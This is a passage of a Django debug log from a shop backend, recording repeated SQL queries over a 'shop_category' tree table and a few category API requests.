"shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:48:01,197 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:48:01,200 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:48:01,203 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:48:01,205 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:48:01,208 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:48:01,210 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:48:01,212 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:48:01,216 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:48:01,218 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:48:01,220 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:48:01,222 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:48:01,224 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:48:01,228 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:48:01,230 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:48:01,233 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:48:01,235 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:48:01,237 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:48:01,240 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:48:01,243 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:48:01,245 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-16 07:48:01,247 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-16 07:48:01,250 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-16 07:48:01,252 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [16/Dec/2019 07:48:01] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-16 07:48:05,314 utils 20136 140506422044416 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-16 07:48:05,320 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-16 07:48:05,324 utils 20136 140506432534272 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 46; args=(46,) DEBUG 2019-12-16 07:48:05,327 utils 20136 140506422044416 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:48:05,329 utils 20136 140506432534272 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-16 07:48:05,330 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-16 07:48:05,334 utils 20136 140506422044416 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) [16/Dec/2019 07:48:05] "GET /api/v1/categories/46 HTTP/1.0" 200 184 DEBUG 2019-12-16 07:48:05,336 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-16 07:48:05,339 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-16 07:48:05,341 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-16 07:48:05,343 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-16 07:48:05,347 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-16 07:48:05,349 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-16 07:48:05,351 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-16 07:48:05,353 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-16 07:48:05,355 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-16 07:48:05,359 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-16 07:48:05,361 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-16 07:48:05,363 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-16 07:48:05,365 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-16 07:48:05,367 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-16 07:48:05,371 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-16 07:48:05,373 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-16 07:48:05,375 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-16 07:48:05,377 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-16 07:48:05,380 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-16 07:48:05,382 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-16 07:48:05,385 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-16 07:48:05,387 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-16 07:48:05,390 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-16 07:48:05,392 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-16 07:48:05,394 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-16 07:48:05,398 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-16 07:48:05,400 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-16 07:48:05,402 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-16 07:48:05,404 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-16 07:48:05,406 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-16 07:48:05,410 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-16 07:48:05,412 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-16 07:48:05,414 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-16 07:48:05,416 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-16 07:48:05,419 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-16 07:48:05,421 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-16 07:48:05,423 utils 20136 140506422044416 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-16 07:48:05,426 utils 20136 